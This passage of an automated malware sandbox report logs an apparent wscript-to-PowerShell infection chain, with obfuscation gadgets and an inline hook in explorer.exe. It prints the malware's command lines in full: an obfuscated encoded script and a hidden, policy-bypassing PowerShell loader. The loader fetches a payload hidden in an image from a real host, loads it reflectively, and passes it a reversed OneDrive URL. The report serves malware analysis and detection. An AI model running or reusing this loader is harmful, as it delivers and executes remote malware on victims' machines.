kDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTreb
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }" Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B8000AD pushad ; iretd 1_2_00007FFD9B8000C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041E87D push ds; retf 5_2_0041E880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041E83C push 2E339416h; ret 5_2_0041E83A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041698A push esp; ret 5_2_0041698B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041C238 push esp; retf 5_2_0041C23D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_00416C44 push 7B91E71Ah; retf 5_2_00416C54
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041D4B5 push eax; ret 5_2_0041D508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041ED66 pushad ; retf 5_2_0041ED67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041D56C push eax; ret 5_2_0041D572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041D502 push eax; ret 5_2_0041D508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041D50B push eax; ret 5_2_0041D572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_00405E02 push esp; ret 5_2_00405E04
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041EEDF push FFFFFFD3h; iretd 5_2_0041EEE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041E770 push 2E339416h; ret 5_2_0041E83A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013809AD push ecx; mov dword ptr [esp], ecx 5_2_013809B6
Source: C:\Windows\explorer.exe Code function: 6_2_0B414B02 push esp; retn 0000h 6_2_0B414B03
Source: C:\Windows\explorer.exe Code function: 6_2_0B414B1E push esp; retn 0000h 6_2_0B414B1F
Source: C:\Windows\explorer.exe Code function: 6_2_0B4149B5 push esp; retn 0000h 6_2_0B414AE7
Source: C:\Windows\explorer.exe Code function: 6_2_0E8ECB02 push esp; retn 0000h 6_2_0E8ECB03
Source: C:\Windows\explorer.exe Code function: 6_2_0E8ECB1E push esp; retn 0000h 6_2_0E8ECB1F
Source: C:\Windows\explorer.exe Code function: 6_2_0E8EC9B5 push esp; retn 0000h 6_2_0E8ECAE7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_000E1A6D push ecx; ret 8_2_000E1A80
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_050E27FA pushad ; ret 8_2_050E27F9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_050EB008 push es; iretd 8_2_050EB009
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_050E1368 push eax; iretd 8_2_050E1369
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_050E225F pushad ; ret 8_2_050E27F9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_050E9939 push es; iretd 8_2_050E9940
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051109AD push ecx; mov dword ptr [esp], ecx 8_2_051109B6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_050E283D push eax; iretd 8_2_050E2858
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02F4C238 push esp; retf 8_2_02F4C23D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02F4E87D push ds; retf 8_2_02F4E880

Hooking and other Techniques for Hiding and Protection
barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xEA
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
